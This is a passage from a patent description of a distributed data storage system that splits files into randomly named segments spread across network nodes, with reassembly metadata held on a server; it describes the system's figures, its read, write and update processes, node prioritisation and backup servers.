file can be accessed only by requesting the information again from the DDSS server. However, at no time may a user of the computer designated as a DDSS client view the segment filenames or paths for the read/write, only the logical filename that represents the segmented data as a single file. - [0037]A DDSS may provide a level of security and privacy as a replacement for data encryption methods. A DDSS may segment files into smaller and smaller segments, distributed over a wider set of nodes to achieve an increasing level of privacy protection as a replacement for data encryption. DDSS file storage, however, can be less machine intensive since the data need not be encrypted and decrypted in connection with each write and read request. - [0038]A DDSS can store data on remote DAS devices, which may reside at a node operated by a user unknown to the client. However, the DDSS may be configured to select a desired level of privacy protection to the information described in the stored data. A user at a DDSS client node need not be concerned with whether sensitive information described in a file and written to another user's local storage being accessible to the other user because only a portion of the file is written to the other user's device, and a file or a portion thereof is broken up among a plurality of files on other nodes not normally accessible to the same user. As such, files may be segmented and distributed such that no one file can convey meaningful information to a user with access to local files. Only when file segments are combined will the assembled data convey meaningful information. - [0039]Meaningful information” is intended to mean information that is capable of conveying a concept, idea, thing, person, etc. to someone who has access to the data. For example, if text in a natural language, e.g., English, is stored according to the DDSS, only a portion of the text may be written to a single node, but this data does not contain a sufficient portion of the text to communicate any meaning in the natural language, much less suggest what information is conveyed in the remainder of the data. The information may be sufficiently distributed out among separate files, called file segments, distributed out over one or more network nodes in a random pattern and with randomly generated filenames, to provide a desired level of security for sensitive information in accordance with this aspect of a DDSS. Other file security measures known in the art may be included, such as encryption, without departing from the scope of this disclosure. - [0040] FIG. 1is a schematic illustration of a first embodiment of a distributed data sharing system (“DDSS”) for a network. - [0041] FIG. 2Ais a schematic illustration of the components of a server-side module portion of the DDSS of FIG. 1. - [0042] FIG. 2Bis a schematic illustration of the components of a client-side module portion of the DDSS of FIG. 1. - [0043] FIG. 3is a flow process associated with writing a file to memory according to a DDSS. - [0044] FIG. 4is a flow process associated with retrieving the file written to memory according to the process of FIG. 3. - [0045] FIG. 5is a flow process associated with updating or overwriting the file written to memory according to the process of FIG. 3. - [0046] FIG. 6is a schematic illustration of DDSS meta data. - [0047] FIG. 7is a schematic illustration of a second embodiment of a DDSS for a network. - [0048]Devices connected over a network will often have significant portions of unused storage space because the local storage space are not readily available over the network. For example, a Local Area Network (“LAN”) for an enterprise will often include devices such as personal computers (“PCs”), file and print servers, each of which can have significant local data storage capacity. The term “local storage capacity” is intended to mean a storage medium, such as a magnetic disk, that is available to a device when it is not connected to the network. - [0049]This local storage capacity is typically not available to members of the network. This is especially true in LANs that require all files located on a network server drive so that the file is readily available when needed, can be tracked and backed up on a regular basis, and will be available when a network device is not available, e.g., when the device is turned off or not functioning properly. In most cases, an enterprise will also prefer central storage over local storage for purposes of more easily managing access and/or viewing rights of files and related protection of sensitive enterprise information. As such, one or more devices connected over the network can have significant storage capacities that are never exploited because enterprise files are maintained at a central server location rather than locally. - [0050]Despite the vast increases in storage capacities over the years, network servers can still prove inadequate for a storage demands over a network. Moreover, even when space is adequate on the server drive, simultaneous read/write demands on the server drive from network nodes can result in exceedingly slow upload and download rates to/from nodes over the network. Attempts have been made to increase the server response time or to more efficiently allocate resources by e.g., implementing schemes for caching more frequently accessed data over the network. - [0051]The invention is directed to embodiments of a Distributed Data Storage System or DDSS. A DDSS allows network clients to access devices at node(s) located on, or accessible to the clients (hereinafter referred to as “DDSS nodes”, “available nodes” or simply “nodes”). This increases the available storage space over the network by utilizing storage space that would otherwise be wasted. In some embodiments, the DDSS may be used to store information over remote DAS devices that individually do not have the space to store the file or whose read/write capability is not suited for a large file. - [0052]In some embodiments a DDSS provides a read and write capability for user data to nodes in such a manner as to maintain a level of privacy and/or confidentiality for a user's data without resorting to procedures requiring verification of, or granting privileges to a user whenever a read and write call is made to a storage device. Client data may be protected by partitioning the real-data associated with a user filename into several data segments, and then saving these data segments across the available, or a portion of the available nodes on a network. User data is accessed through these segments, and data modified is re-saved in the same or different segments depending on the current availability of nodes. In some embodiments data segments can be saved redundantly in the event that a node becomes unavailable to the DDSS. - [0053]In one embodiment, a DDSS is implemented as a DDSS server located at one node of a network and DDSS clients are located at one or more other nodes. The network may be a peer-to-peer or server-less network, or a network in which one or more dedicated servers, e.g., print, file, e-mail, are connected at one or more network nodes. A DDSS server and client(s) according to this embodiment may be configured by installing and running respective server and client applications over the operating systems located at each of the respective designated server and client nodes. In this embodiment, the DDSS can be initiated or terminated like other applications resident at network nodes, and can access a computer's system resources through an operating system's application program interface (“API”). - [0054] FIG. 1is a schematic illustration of a network having a DDSS capability. Node 1 is designated as a DDSS server node and node 2 a DDSS client node. A DDSS server module application (“server-module”) 20 a is installed at node 1; and a DDSS client module application (“client-module”) 20 b is installed at node 2. The server-module and client-module interact with each other when a user at the client node 2 requests a DDSS read or write. It will be understood that nodes 3, 4, and 5 may also be designated as DDSS clients. Further, node 1 may be designated as both a DDSS server and DDSS client. Finally, the number of network nodes that may be part of a DDSS is not limited to the five depicted in FIG. 1. Thus, the five nodes depicted in FIG. 1should not be interpreted to indicate that a DDSS is limited to smaller networks. Indeed, a DDSS may be most useful on large networks where there are several nodes that can be utilized by the DDSS for storage, and data may be more widely dispersed to maintain confidentiality/privacy of data. - [0055]Connection 11 a, 12 a, 13 a, 14 a and 15 a may correspond to a connection over a LAN or WAN. The connections may be made by physically connected nodes, such as through routers, switches, hubs and network servers. A node may function as both a DDSS server and a network server. Some connections may be made by way of a wireless connection, or a mix of wireless and physical connections among nodes. Standard network communication protocols may be used to communicate and transfer data according to a DDSS. - [0056]Each node may connect to a variety of computer types, such as a workstation or multi-function printer. For example, node 4 connects a computer having an I/O device such as a keyboard and/or mouse 4 d, and monitor 4 b. Other nodes in the network may connect to a server computer, workstation, and/or a Personal Data Assistant (“PDA”), etc. Nodes 1, 2, 3 and 4 have a local storage capacity as designated by storage icons 1 c, 2 c, 3 c and 4 c. Nodes may be DDSS clients, but with only minimal local storage capacity, such as node 5, or where local storage that is not accessible to the DDSS over the network. One example would be a thin client, such as a terminal, or a device whose filesystem is incompatible with a filesystem of a DDSS client. A node may also connect to a computer blade having local storage, processor, motherboard, operating system, etc., but no I/O device other than a network I/O device. - [0057]Storage at DDSS nodes 1, 2, 3 and 4 is indicated by storage areas 1 c, 2 c, 3 c and 4 c, respectively. A storage device, e.g., storage device 1 c, may correspond to a single device, or a cluster of devices organized in a logical way so that they may be part of a single namespace. Each of these storage areas are partitioned between a portion 11 a, 12 a, 13 a, 14 a and 15 a restricted to a local account and a portion 11, 12, 13, 14 and 15 accessible to the DDSS server and client(s) over the network. Portions 11, 12,13,14 and 15 may be made accessible to the DDSS server and client modules 20 a, 20 b by way of any suitable file sharing utility known in the art. One example is the file sharing utility provided in the Microsoft Windows XP® operating system's file sharing utility. Standard network and channel protocols may be used to transfer data to/from the server, client and storage devices, as well as to communicate commands or requests over the network as known in the art. Thus, it is understood that the disclosed DDSS may be implemented using existing network architecture, including the communication and data transfer protocols used by networks. - [0058]The DDSS selectively accesses storage areas 11, 12, 13, 14 and 15 at the available nodes, which may include network or DAS storage devices associated with a node. A storage device may include such physical memory devices as magnetic or optical storage mediums, solid state or any other suitable device that provides physical storage space. DDSS storage space may also reside at remote storage area(s) connected to a node through another network connection. For example, node 3 may be a NAS server connected to clusters of storage devices 3 c or another network having a plurality of additional available nodes. The storage spaces may be DAS devices accessible through a local operating system that grants read/write privileges to the DDSS over the network. Both DAS devices and network storage, e.g., central server, SAN, NAS or SAN-NAS hybrid architectures, network printers, e-mail and file servers, etc. having a storage capacity may be included among the storage spaces accessible to the DDSS. - [0059]A DDSS may be added to an existing network by a DDSS initialization routine, which may be directed through a DDSS server computer, e.g., node 1, a computer which has an installed DDSS server module 20 a. The DDSS initialization procedure includes mapping a portion, e.g. a folder, directory or volume, of the DDSS server storage space to the DDSS clients' filesystems. Thereafter, the DDSS client(s) may access its assigned portion of the DDSS server space. The client's allocated DDSS space may be added to the client's filesystem as a new volume included in, e.g., the client's File Allocation Table (“FAT”). - [0060]DDSS initialization also includes mapping the storage space available to the DDSS over the network, e.g., mapping the space 11, 12, 13 and 14. In some embodiments, this storage space is directly mapped to both the server's file system and each of the clients' filesystems. In these embodiments, both the client and the server can access the storage space independently of each other. Further, because the client's computer's filesystem may include a mapping of its allocated remote storage space, the client computer's operating system may read data from, or write data to the remote storage space just as it would for any other device. Remote space may be added as new volumes included in the server's and clients' FATs. - [0061]In some embodiments, the server may access the DDSS storage space to perform operations such as removing files that were not properly replaced or updated due to a system crash at the node or over the network. The server may also access nodes for purposes of monitoring the network traffic to/from a node, as will be explained shortly. Clients may only perform a read and/or write for files located in their allocated DDSS storage space. In some embodiments, at both the server and client nodes there may be an administrator account that has greater access rights than a client to the DDSS server storage and/or the storage space at the nodes. The administrator account may be used to re-partition storage space among clients, remove old files and/or clean-up DDSS storage space, re-initialize the DDSS, restore files (either DDSS server or DDSS client data) from a remote backup, add/remove a node to the DDSS, add/remove DDSS clients, servers, etc. - [0062]Clients may be created/added to the DDSS by downloading a copy of the DDSS client-side application (e.g., client module 20 b) from the DDSS server-side application (e.g., server module 20 a). Initialization of a client through the client module may include such steps as creating a client account at the server side, setting up a client quota of storage space, creating a password for accessing the DDSS, selecting a directory or folder location on the client computer for storing DDSS-related files, etc. The initialization process would also include mapping the server storage space for the client to the client's filesystem, and the mapping of the remote space allocated to the client, either directly or through the server (as discussed earlier). - [0063]Once initialized the DDSS can be accessed by the clients. The server application is preferably running continuously, whether or not there is a client session in progress. Most of the DDSS server space may be mirrored in cached memory to increase speed. This can be possible because most of the DDSS server space contains only information about files, such as the metadata and file names, as opposed to the real data contained in the files. The contents of the server space may be frequently written to a designated backup device in the event that the server computer becomes unavailable. In a preferred embodiment, a file once saved to DDSS is removed from the client's storage space. Thereafter, the client's file is accessible through the DDSS storage space and backup. - [0064]In the event the DDSS server computer fails, or the server node become inaccessible, or the server node becomes unavailable to one or more clients, one or more secondary or backup DDSS servers may be called upon to act as DDSS servers until the primary server is available again. In these embodiments, a DDSS session may include periodic updates to the secondary, or backup DDSS server(s), which are installed and resident in memory at the designated backup server but otherwise inactive until the primary DDSS server becomes unavailable. When the primary server becomes unavailable to one or more nodes, the backup servers may be notified of this event through frequent “pings” of the server node, or by a message received from one or more client nodes. When so notified, the backup server would retrieve the DDSS server's files and/or client files from a backup device, and run in place of the primary server until communication with the primary server is regained. - [0065]In some embodiments, the DDSS may have a secondary or backup server module component to a client node installed within proximity to a logical grouping of client nodes. For example, suppose a business located in a building has three floors and each floor defines each logically grouped domain or node cluster for the network (e.g., a sales, marketing and design domain of the network). Each floor may designate a backup which, in the event of failure of the DDSS primary server, acts as a local backup DDSS server to server the nodes on that floor. - [0066]The DDSS server may maintain information about a DDSS client in a client account record managed by server-based account manager utility. A client account record may include such information as a network node address, the client's viewing or access rights to the server storage space and/or remote devices, the client's quota of storage space, the location(s) of backup files, and client verification information when a DDSS session request is received from a node, e.g., a password and node associated with the client. A viewing right refers to a right to see files, folders and/or directories, but not inspect their contents. An access right gives the right to view at least a portion of the contents of a file. In some embodiments, clients may be given access rights to some files, but only viewing rights to others when directories are shared between different clients. In some embodiments clients may view and access files only at the client's allocated root directory and directories below the allocated root directory. - [0067]A DDSS session request would be initiated by the client, e.g. at node 2 in FIG. 1. The user accesses the login screen provided by a client-side application, e.g., client module 20 b, and enters the password for the DDSS client for that DDSS node. The server-side application, e.g., server module 20 a, receives a request for a session with an accompanying password and node ID. The received node and password are checked against the client account records to verify that a user is submitting a valid request for access to the DDSS for that node. When the correct information is received, the server grants read/write privileges to the client node's portion of the server space. - [0068]Client accounts may also include information that is needed to re-initialize DDSS connections, increase or decrease the space allocated to a client and other client-specific information needed by a server. Some of this information may also be available through a network server or manager. After a client has successfully logged-into the DDSS the user at the client node may read data from, and write data to the DDSS storage space in the manner that it is accustomed to under the client's operating system. The DDSS space is mapped to the client's filesystem as one or more volumes. One filesystem and associated namespace structure that can be used to map to one or more networked computers is the Microsoft Windows XP® operating system's file sharing utility. Other commercially available applications that interface to an operating system's API to provide a user with file-sharing capabilities among one or mode nodes connected over the network may also be used. - [0069]As such, a DDSS read/write capability, as explained next, may be readily implemented over an existing network. A network user would only need to manage its local filenames and directories under the DDSS device(s) as it would for any other device in its filesystem. The third person pronoun “it” is intended to refer to either a real person interacting with a client computer through a local I/O device, such as a mouse, or a remote computer that accesses the client computer. As such, “user” under this disclosure may be either a real person or a computer that remotely controls a DDSS computer at a network node. - [0070]A DDSS read and write process will now be described with reference to the network depicted in FIG. 1. The computer, e.g., a multi-function printer, at node 1, in FIG. 1has installed a server module 20 a and is designated as the DDSS server. Similarly, the computer, e.g., a PC, at node 2, has installed client module 20 b and is designated as a DDSS client. As DDSS server functions (as implemented through server module 20 a) use resources at the node 1 computer, computer resources such as its operating system, storage devices, virtual memory (e.g., static and dynamic RAM), I/O devices, etc. at node 1 will, for the sake of convenience, be referred to as the DDSS server operating device, memory device, etc. Similarly, As DDSS client functions (as implemented through client module 20 b) use resources at the node 2 computer, its computer resources will, for the sake of convenience, be referred to as the DDSS client operating device, memory device, etc. Computer resources of a server and/or client, respectively, may be shared with other network tasks, e.g., local e-mail sending/receiving and internet activities. Thus, the designation of, e.g., a server storage or I/O device, should not be interpreted as a DDSS-dedicated storage or I/O device, although in some embodiments these devices can be dedicated to DDSS related tasks. - [0071]Both the server module 20 b and client module 20 a may perform tasks associated with storing a user's file according to a DDSS write process ( FIG. 3), a read process ( FIG. 4), and a file modify process ( FIG. 5). - [0072] FIGS. 2A and 2Bare tables describing tasks associated with the client module 20 b and server module 20 a. The client module 20 b includes a SEGSELECT module, PARTITION module, WRITEMAP module and R/W module. The server module 20 a includes a NODEQUERY module, DRIVEINSPECT module, and a GENPATH module. As discussed earlier, the server module may also include an account manager utility for managing client accounts. As will be understood read/write related tasks may be distributed differently between the server module 20 a and client module 20 b. Thus, it should be understood that the functions associated with a particular module, as depicted in FIGS. 2A and 2Bneed not all reside in that module, or entirely with the server and client, respectively. Rather, it is contemplated that tasks may be assigned or shared differently among modules, and/or additional modules may be used to perform some of the tasks assigned to one module. In some embodiments, client module 20 a may perform tasks 311-315 of a write process, and server module 20 b tasks 301-306 as depicted in FIG. 3. - [0073]A user at node 2 (“CLIENT2”) wishes to store a file in the DDSS. This process may be initiated by the user simply initiating a write procedure at the DDSS server space assigned to the client, which is detected by the server. The write may not be carried out in whole or in part, but rather suspended and re-directed by the client module. The client module, with the assistance of the server module, will then direct the write to the DDSS storage space according to a DDSS write process. - [0074]The client's DDSS storage space will be called “s:\node2”. The server may be notified of the write attempt either by its operating system detecting a system call, or by a write notification received from the client. The file may have been generated by an application resident at the client computer, or an existing file that is being moved to s:\node2. The logical name of this file in the CLIENT2 filesystem will be “FILEA”. - [0075]After the write attempt to detected or a write request is sent to the server, the server module 20 a and client module 20 b perform the DDSS write process. This process includes transferring the real data in FILEA to the DDSS storage space assigned to CLIENT2. The real data is segmented and stored in different files called file segments. After the real data in FILEA FILEA are located, and the order in which FILEA is re-assembled from the file segments. This DDSS meta data is stored in physical memory only at the DDSS server, which is password protected. - [0076]When the server detects, or is notified of a write request, the file logical name, and size, and the node requesting the write is reported to module NODEQUERY. This module is tasked with surveying all remote storage space accessible to the DDSS, and choosing from among the most preferred nodes for writing FILEA. Hereinafter these devices or storage spaces, accessible through the nodes of the network, shall simply be called “nodes”. Thus, in FIG. 1, the DDSS has four nodes for storing data, or four nodes having storage space, because at each of the nodes 1-4 there are respective shared storage devices 1 a, 1 b, 1 c, 1 d having DDSS accessible storage spaces 11, 12, 13 and 14. - [0077]NODEQUERY includes a node prioritization algorithm that prioritize nodes for storage based on a variety of factors. For example, the nodes given the highest priority for storage may be the nodes that are connected through a high bandwidth connection, nodes that have the lowest rate of packet errors, nodes that are located relatively close to the DDSS client, and so on. Nodes may also be prioritized by the amount of network activity at the node, or read/write requests on the storage device(s) connected to the node. Thus, a node that is currently not being used may be chosen over a node that is experiencing a high volume of read/write requests. NODEQUERY may at regular intervals “ping” each DDSS node so that it will have on-demand information about the level of activity at every DDSS node when a write request is received from a client. - [0078]A node may be given a lower priority if it has a small amount of available disk space relative to the size of FILEA. A node that is currently not available, e.g., because the device at the node is disabled, would be excluded from the list of nodes under consideration. NODEQUERY may also notify a client in response to a write request that FILEA exceeds its allocated DDSS space. This information may also be communicated to the user prior to notifying the server that a DDSS write is requested. - [0079]A prioritized list of nodes for storage of FILEA is created at step 302 and held in NODEINFO. This array of node information may simply provide a prioritized list of nodes and the available space at each node. At step 303, NODEINFO is sent to client module 20 b. - [0080]At step 311 client module 20 a selects, based on the information in NODEFINO, the amount of partitioning for FILEA. The partitioned real data in FILEA is organized into data segments. The number of data segments for FILEA may be based on at least one of privacy concerns for the user's data, the available space, and the rate and/or manner at which data can be written to a remote device (e.g., block size for reading/writing). For example, if FILEA is segmented across all available nodes, then no one node has any portion of data from FILEA that can provide any meaningful information about the contents of FILEA because the data is widely dispersed over the network. Additionally, several file segments may be written to the same device to further distribute the real data. The amount of segmentation may also be based only on the available space at the various nodes. Thus, FILEA may be partitioned into several segments so that its contents can be stored at the available nodes. - [0081]Step 311 also includes the selection of the number of copies of each data segment that will be stored over the network. Copies of each data segment, stored on separate nodes, may be desirable as a way of ensuring that if a data segment stored at a node later becomes unavailable, the copy can be accessed at a different node. As such, a DDSS may be configured so that there are several layers of redundancy for file segments, spread over the nodes, so that a segment not available at one node will be available at another node. - [0082]In some embodiments, client module 20 b may have a fixed number of segments and copies for a file, based on its size. In this case, the client module selects up to this number of segments and copies, or the maximum number of available nodes for segments and copies under NODEINFO, whichever is less. In some embodiments, the client module may select the number of nodes based on a block read/write size, which selection parameter may lead to increased efficiency during a read/write from nodes. - [0083]In some embodiments, client module 20 b may be configured to select all nodes that are above a threshold node “score” provided by NODEINFO. A node score is intended to refer to a ranking of the nodes based on a variety of factors, such as the average speed of the connection (i.e., bytes per second), type of connection (e.g., wireless, optical, etc.), the average response time to a “ping”, number of packet errors per transmission, and the computer or device type at the node. In some embodiments, the client module 20 b may contain a user-selectable number of segments and/or copies of segments. - [0084]At step 312 the client module 20 b informs the server module 20 a that FILEA will be segmented into “N” number data segments and “M” number of copies based on NODEFINO. - [0085]When the requested number of data segments and copies are received at the server, the GENPATH module is used to generate names for each of the file segments that store the real data from FILEA, and the corresponding logical names and addresses for the file segments. Preferably, the file segment names are randomly generated so that a user, other than the file owner, who views the written file segments without access to the FILEA meta data, cannot discern from the segment filenames what file they originate from, the order in which the real data in the segments should be combined to re-create FILEA, or whether the file segments are even related to each other. In essence, the file segments may be stored such that the portion of the real data in a file segment is worthless without the DDSS meta data to at least locate the parts of the original file. One example of DDSS meta data for FILEA is shown in FIG. 6. - [0086]In some embodiments, GENPATH may include a random number generator used to derive a random filename. For example, any suitable pseudo random number generator that returns a random number, e.g., a real number over the interval 0 to 1, may be used to randomly select each letter, number and/or symbol that when combined form the logical filename. When files are written with randomly generated logical names in this manner, any relationship among the files should not be detectable by inspection of the logical names, especially when there are many other, unrelated files in the folder or directory that also have filenames that were randomly generated. Indeed, for purposes of making it more difficult for an unauthorized user to extract meaningful information from file segments, it may be desirable to have all DDSS clients' file segments stored in the same directory or folder of a remote storage space. In this way, it will be more difficult to find file segments that are related to each other. - [0087]Further steps may be taken to ensure that meaningful information cannot be obtained from the file segments. For example, meta data can be stored at the server, as opposed to with the file segment or directory at the remote node. In some embodiments, file segments written to the same node can be written in a non-sequential, random or intermittent fashion. For example, if FILEA were segmented into six segments with filenames S1, S2, S3, S4, S5 and S6, and designated for storage at nodes A and B, the write sequence may be directed to prevent any two consecutive file segments (i.e., file segments having real data portions that immediate follow each other in the original FILEA) from being written to the same node. Thus, segments S1, S3 and S5 would be written to node A, and segments S2, S4 and S6 would be written to node B. As segment S2 was not stored at the same node as S1 and S3, it should be more difficult to extract meaningful information from the real data in S1 and S3, or the real data in S2, S4 and S6, etc. if the unauthorized user is only able to view data stored at node A or B, respectively. - [0088]The write sequence, file segment names, partitioning information for FILEA, e.g., byte offset and size for each data segment, and segment file logical paths are sent to CLIENT2 in SEGMAP at step 305. SEGMAP may also provide an alternative node for a file segment. In the event that the preferred node is unavailable to the client module 20 b, although appearing accessible to the server, the client may write to the alternative node instead of the preferred node. - [0089]In some embodiments, steps 301 and 312 may be combined and steps 311 and 312 eliminated in FIG. 3. When the server receives information about FILEA from the client at step 301, e.g., the size, name, and client requesting the write, it may also receive the client's requested number of segments and copies for the write. This may be a preferred write process when the client's choice of nodes does not depend on the information reported in NODEINFO. The server may then gather the information it needs from NODEQUERY and then proceed directly to SEGMAP using the information in NODEINFO and the N segments and M copies, which accompanied the initial write request received at step 301. the write process may then proceed to step 305. - [0090]At steps 313 and 314 the PARTITION module partitions FILEA according to SEGMAP and the R/W module writes the file segments to the DDSS storage space. preferably, steps 313 and 314 may be carried out at the same time, i.e., a first file segment is partitioned then written to a node, a second file segment is partitioned, then written to a node, etc. After all segments have been written to the remote devices, the WRITEMAP module constructs a MAPFILE indicating the filenames and corresponding logical paths where the data segments were written, the partitioning information from SEGMAP, and file-by-file meta data such as a timestamp. In some embodiments, meta data normally stored with the file is removed and instead stored in the MAPFILE so that an unauthorized user at a remote node cannot use the meta data to re-assemble the real data in the file segments. The amount of meta data that can be stored at the server and not at a node, i.e., not with the local filesystem, may be limited by the filesystem upon which a DDSS operates. - [0091]If all files were written to the nodes specified in SEGMAP, and in the order specified by SEGMAP, then MAPFILE is the same as SEGMAP. However, if SEGMAP alternative nodes were used, or the segments were stored in a different order, then MAPFILE will have different file segment information. At step 315 the client module 20 b sends MAPFILE to the server and then deletes this file from its memory. If the DDSS was called through an API for an application still running at the client, MAPFILE may remain in RAM at the client and then be removed from memory when the user exits the application. - [0092]When MAPFILE is sent to the server at step 315, a successful write is confirmed. At step 306 the information in MAPFILE is stored in a file called “FILEA.DDSS”. As mentioned earlier, the file FILEA.DDSS contains the meta data that enables the re-assembly of FILEA from the file segments and may include, among other things, the file meta data that would normally be stored at the remote node. - [0093]In some embodiments, SEGMAP and MAPFILE can be the same file. In these embodiments, the sever module 20 a may simply store SEGMAP as FILEA.DDSS and unless a write error is reported by the client, e.g., the client indicates that an alternative node was used, the meta data stored with the server is understood as an accurate mapping for the segments written by the client to the DDSS storage space. If the client R/W module reports, for example, that an alternative node or sequence of writes was used (other than that recommended by the server in SEGMAP), then the client may simply provide an update to SEGMAP, e.g., MAPFILE, which replaces the server's copy of the meta data in FILEA.DDSS. - [0094]At step 307 a backup copy of FILEA.DDSS is made by the server. The account manager at the server may then add the logical name FILEA.DDSS.BACKUP to the CLIENT2 account record, indicating the address where a backup of the FILEA meta data may be found. - [0095]A read process for FILEA, previously stored by the DDSS write process, may proceed as depicted in FIG. 4. The read process begins when the user at node 2 selects FILEA.DDSS at step 401. “Select” can be a double-click (because the extension “DDSS” is added, the local operating system can easily associate the file with the DDSS client-side application), or a single click with a subsequent selection of “open DDSS file” menu selection, or a “open DDSS file” as an add-in to an application running on the client computer. At step 402 the R/W module reads the contents of FILEA.DDSS, which indicates that N file segments and M copies contain the real-data from file FILEA. “FILEA” is also re-created, either at s:\client2, as a file resident in RAM at the client computer, or as a temporary file accessed by an application running at the client computer. The file may have the same logical name as it did when it was originally placed there by the user. The DDSS read process reads the real-data in the file segments and stores them in FILEA according to the meta data in FILEA.DDSS such that FILEA is identical to the version originally indicated for storage under the DDSS. - [0096]FILEA.DDSS may contain information indicating the owner of FILEA, in addition to the information needed to retrieve the FILEA segments, segment copies, and the information needed to re-assembly FILEA from the file segments. One example of FILEA.DDSS is the record 59 depicted in FIG. 6. A first record 60 indicates the ownership of FILEA by the CLIENT2 60 a and node 2 address 60 b. A second record 62 indicates the user's filename 62 a (FILEA), the number of file segments for FILEA 62 b (N), and the number of copies of segments 62 c (M). - [0097]A third record 64 provides N rows of data corresponding to each of the N file segments. The first column 64 a indicates the order in which the file segments identified in subsequent columns 64 b, 64 c and 64 d are to be written/were written to the remote nodes. Columns 64 b indicate the logical names and logical paths for the file segments, respectively, and columns 64 c indicate the start position (as a byte offset) and size (in bytes) of the real data portion in FILEA for the segment, respectively. Columns 64 d may provide the meta data related to the most recent read and write of the segment to the remote node. As indicated by the sequence 3, 1, 2, . . . in column 64 a, the segments may be written to remote nodes in a non-sequential order for the reasons discussed earlier. As also discussed earlier, the logical filenames may be randomly generated and no consecutive segments, e.g., “name-1” and “name-2”, may be written to the same node. - [0098]A fourth record 66 provides M rows of data corresponding to each copy of a file segment in record 64. Some or all file segments may have one or more copies, or levels of redundancy. The first column 66 a indicates, as before the order in which the copies identified in subsequent columns 66 b, 66 c and 64 d are to be written/were written to the remote nodes. Columns 66 b indicates the logical names and logical paths for the copies, and column 66 c indicates which segment from the record 64 corresponds to the copy. Columns 66 d may provide the meta data related to the most recent write and read to the remote nodes. - [0099]Returning again to FIG. 4, the DDSS read process begins at 403. For each of the N segments, which together contain all real-data from FILEA, the R/W module first checks to see whether the segment “SEG(i)” specified in record 64 is accessible at step 404. If SEG(i) is intact and accessible then it is read into FILEA at step 405, starting at the byte offset specified at 64 c in record 64. After all N segments have been read into FILEA, the DDSS read process terminates. If FILEA is too big to hold in virtual memory, then FILEA may be written to temporary storage. - [0100]If a node is unavailable, or a segment corrupted or missing, then the R/W module attempts to access the address where a copy is stored at step 406 based on the information in record 66. The R/W module finds the copy of the missing segment from column 66 c, then attempts to access the copy using the logical name and path specified in the corresponding field 66 b. - [0101]At step 407 the R/W module checks to see whether the copy specified in record 66 is available and intact. If yes, then the copy of SEG(i) is read and stored in FILEA as before, and the R/W module turns to the next file segment, i.e., SEG(i+1), and so on. If no, then the R/W returns to record 66 and searches for the next copy of the segment, and so on until a copy of the segment is found. The space reserved for the segments and copies of segments unavailable during the initial read are released when those respective nodes become available again (step 411). - [0102]A process for storing a file previously saved to the DDSS is depicted in FIG. 5. The process begins when the DDSS server detects an attempt to store a file having the same name as a previously stored file at step 501. Upon this occurrence, NODEFINO (see FIG. 2A) is called (step 502) to indicate whether the paths in FILEA.DDSS are available for storage at step 503. If all paths are available, then server module 20 b directs the client module 20 a to use the information in FILEA.DDSS in place of SEGMAP from step 305, and then partition and write FILEA to the specified nodes at steps 313 and 314, as described earlier. Steps 306 and 315 are repeated. If a node address specified in FILES.DDSS is not available, then the write process is repeated from step 303. That is, a revised NODEFINO is sent to the client (step 303), a new set of segments and copies are selected at step 311, etc. When the unavailable nodes become available, the DDSS server deletes the previous segment files at those nodes. - [0103]Server module 20 a includes a DRIVEINSPECT module for performing housekeeping functions for the DDSS storage space. This module may remove segments or copies of segments that were not accessible and re-written or replaced by alternative or new segments or copies. DRIVEINSPECT receives logical names and paths of segments/copies that R/W module is not able to access. Then, when a node becomes available again, DRIVEINSPECT performs the housekeeping to free-up device space. DRIVEINSPECT may also perform backup functions for client *.DDSS files stored on the server space, and/or monitor remote node disk space directly or through a network server. This module may also be located at a client, as opposed to with the server. - [0104] FIG. 7depicts a second embodiment of a network configured as a DDSS. In this embodiment, the node 1 is, once again designated as the primary DDSS server and has installed locally the server module 20 a. Server 1 also has a local storage capacity 1 c, with storage 11 b allocated for non-DDSS use and a storage space 11 for DDSS server activities, as in other embodiments. - [0105]The network depicted may be a centralized network, such as a star network, or a decentralized network, such as a bus or ring network. The network may be any network topology where nodes are typically organized logically or physically into separate domains. For example, the nodes may be organized into physical domains based on the physical location of nodes, connection types between node groups, etc., or logically according to the shared resources or information among nodes, or related functions by members users at the nodes, i.e., sales verses administrative employees of a company. - [0106]In some embodiments, the nodes are connected to, or accessible from or to the network according to the different functional groupings of a company. For example, suppose a company has grouped its nodes over the network according to the nodes used, assigned or allocated to sales, marketing, and engineering groups. The network linking all of these groups of the company may then be organized such that nodes 100, 102 and 104 serve as gateway nodes to a group. “Gateway” here is intended to mean a node that connects a first network to a second network or simply a node that provides a serial path connection between groups. In another embodiment, the paths 100 a, 102 a, 104 a which connect the domains i, ii, and iii to the server 1 are not limited to a single serial connection, but rather a separate connection for each of the local domain nodes to one or more of the nodes in or accessible to the network. In this case, the nodes 100, 102 and 104 may therefore represent a network switch connecting each of the nodes in the sales, marketing and engineering groups to all other nodes over the network. - [0107]Within each of the domains i, ii, iii there are one or more nodes that are connected to storage devices that are part of a DDSS storage space, and one or more nodes that are DDS enabled clients. The DDSS storage space may include such devices as workstations and printers associated with a domain. Client management and DDSS meta data is stored and managed at server 1 which may be associated with a network server or may simply be one of the nodes of a domain. Within a domain, e.g., domain iii, there are nodes 101, 102, 103 connected to the network through paths 101 a, 102 a and 103 a that, as mentioned earlier, may be connected to the rest of the network by a gateway or a network switch 100. Nodes 101, 102 and 103 may each be DDSS clients, and both DDSS clients and DDSS storage nodes. - [0108]The initialization of the DDSS is similar to that discussed earlier. In the case of decentralized network, each client may map the storage space directly by accessing a node. In a centralized network, the client may receive rights to read/write to DDSS nodes through a central server and have a local mapping of the allocated DDSS storage space. The server 1 may gain access to DDSS storage space in the same manner. Similarly, DDSS server space may be requested directly from the server or by a central server for the network. - [0109]The read/write priorities, as specified in SEGMAP may prioritize nodes for storage that share the same domain as a DDSS client. For example, the available storage at a local printer may be designated as a default DDSS node for storage for clients that are part of that domain. If the storage at the printer becomes unavailable, then a less preferred node, e.g., a node of another domain, would be selected. - [0110]In some embodiments, the DDSS may have a secondary or domain DDSS server node designated at a node within each domain. Each of these domain DDSS servers would receive periodic information about the read/write meta data for members of the domain from the central server 1, as well as copies of the DDSS client accounts at that domain. In the event that the server 1 becomes unavailable, e.g., either by a message received from a DDSS client, or by a failed status request from the backup server to the primary server, the domain DDSS server would become active and assume the roles of the primary server 1 for just that domain. In the event that a backup or domain DDSS server is needed, the DDSS nodes for storage may be limited to the DDSS storage space within the domain. - [01 (25) -, comprising the steps of:the client accessing storage space at the server node after the server recognizes the client as a client of the server;writing a first data segment of the file to node A and a second data segment of the file to node B, including the steps of:choosing node A and node B for storage of the first and second data 